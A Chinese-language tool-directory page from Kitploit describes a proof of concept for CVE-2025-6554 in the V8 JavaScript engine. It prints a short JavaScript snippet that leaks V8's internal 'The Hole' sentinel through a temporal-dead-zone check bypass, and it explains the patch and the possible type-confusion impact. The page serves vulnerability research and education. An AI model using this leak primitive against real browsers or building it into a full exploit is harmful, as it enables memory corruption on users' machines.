Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-6554 — 针对 V8 JavaScript 引擎漏洞(CVE-2025-6554)的概念验证漏洞利用,演示了 TDZ 绕过,可泄露“The Hole”哨兵值,从而引发类型混淆并可能导致内存损坏。 | Kitploit
工具/GitHubGitHub/pwntoday/cve-2025-6554
漏洞分析漏洞利用论文与研究学习与教育二进制利用
GitHubpwntoday/cve-2025-6554

CVE-2025-6554

针对 V8 JavaScript 引擎漏洞(CVE-2025-6554)的概念验证漏洞利用,演示了 TDZ 绕过,可泄露“The Hole”哨兵值,从而引发类型混淆并可能导致内存损坏。

查看仓库
231年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-6554

root@kitploit:~
function leak_hole() {
    let x;
    delete x?.[y]?.a;
    return y;
    let y;
}
function pwn() {
    let hole = leak_hole();
    %DebugPrint(hole);
}
pwn();

漏洞

变量 y 在声明之前被访问。正常情况下这会触发 ReferenceError(暂存死区,TDZ),但在旧版 V8 中,当与 delete x?.[y] 结合使用时,检查失败并返回内部哨兵值 "The Hole"。

补丁前

V8 仅检查了一次 TDZ,然后错误地假设 y 是有效的。这使得 "The Hole" 逃逸到用户代码中。

修复

该补丁在每次访问时强制进行新的 TDZ 检查(ThrowReferenceErrorIfHole),确保在初始化之前访问 y 总是会抛出错误。

影响:攻击者可以捕获 "The Hole" 并滥用它进行类型混淆、栈操作或作用域绕过。

下载工具